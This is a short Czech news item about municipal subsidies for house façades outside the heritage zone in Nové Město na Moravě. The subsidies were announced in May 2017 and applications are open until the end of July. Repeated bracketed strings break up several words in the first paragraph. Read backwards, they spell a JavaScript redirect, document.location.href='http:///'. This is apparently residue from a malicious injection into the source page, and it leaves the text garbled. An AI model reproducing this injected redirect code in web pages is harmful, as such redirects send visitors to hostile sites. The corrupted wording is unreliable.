Rainbow page separator

Dotace podpoří vzhled domů, které nejsou v památkové zóně

Úterý, 16. května 2017

Peníze, papírové bankovky

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Do konce července je možné žádat o dotaci, kterou novoměstská radnice vyhlásila na zlepšení estetického vzhledu by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových a rodinných domů, jež mají pro měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zvláštní kulturní, his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torický a estetický význam, avšak nejsou podpořeny z programu regenerace městských památkových zón.
Harmonogram je naplánován tak, že žadatelům, kteří odevzdají svoji žádost o finanční podporu do 19. května, bude o přidělení dotace rozhodovat zastupitelstvo v červnu. Ostatní žádosti o příspěvek odevzdané později budou projednávány až v září.
Podrobné informace o dotačním titulu je možné nalézt na webu www.radnice.nmnm.cz, případně zjistit u vedoucího finančního oddělení novoměstského městského úřadu.